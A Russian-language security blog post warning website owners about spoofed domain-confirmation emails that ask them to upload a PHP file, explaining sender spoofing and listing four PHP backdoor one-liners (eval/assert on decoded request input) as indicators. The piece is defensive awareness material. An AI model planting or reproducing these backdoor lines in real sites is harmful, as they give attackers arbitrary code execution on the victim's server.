Не доверяйте этим поддельным электронным письмам с подтверждением домена
Если вы когда-нибудь получите письмо любого рода с просьбой создать, загрузить или установить какой-либо код PHP на вашем сайте, вы должны игнорировать его.
English version: Do not trust those fake domain confirmation emails
Недавно некоторые из моих клиентов получили странные электронные письма от своих регистраторов доменов. Эти письма содержат запрос на подтверждение собственных доменов. Я проверил одно из этих писем и быстро идентифицировал его как мошенническое письмо . Все письма имеют одинаковый рисунок и просьбу создать файл PHP в корневой папке на сайте с определенным названием и заданным содержимым. Излишне говорить, что предлагаемое содержимое для этого PHP-файла содержит вредоносный код, известный как бэкдор-код. Такой код позволяет злоумышленнику выполнять любые действия на веб-сайте жертвы.
Если вы когда-нибудь получите письмо любого рода с просьбой создать, загрузить или установить какой-либо код PHP на вашем сайте, вы должны игнорировать его. Без исключений. Даже если письмо придет от президента или твоей мамы.
Мошеннические письма кажутся законными из-за легитимного адреса отправителя электронной почты . Но это подделка электронной почты. Вы не ожидаете получить поддельное электронное письмо от своих друзей или регистратора домена. Верно? Нет! Любое письмо электронной почты может содержать любой адрес электронной почты отправителя. Подавляющее большинство почтовых серверов и почтовых клиентов не проверяют и не подтверждают адрес отправителя. Итак, вы видите это так, как хотел хакер. Вы не должны доверять никакому электронному письму, которое вы получили от известного отправителя, если письмо содержит запрос на какое-либо подозрительное действие, такое как установка кода на ваш веб-сайт или приложение на вашем компьютере.
Технические детали
Поддельные электронные письма обычно содержат некоторые из следующих строк PHP.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
К вашему сведению: base64_decode, eval и assert — хорошо известные маркеры подозрительного или вредоносного PHP-кода.
См. также: Инспектор плагинов выявляет проблемы безопасности с другими плагинами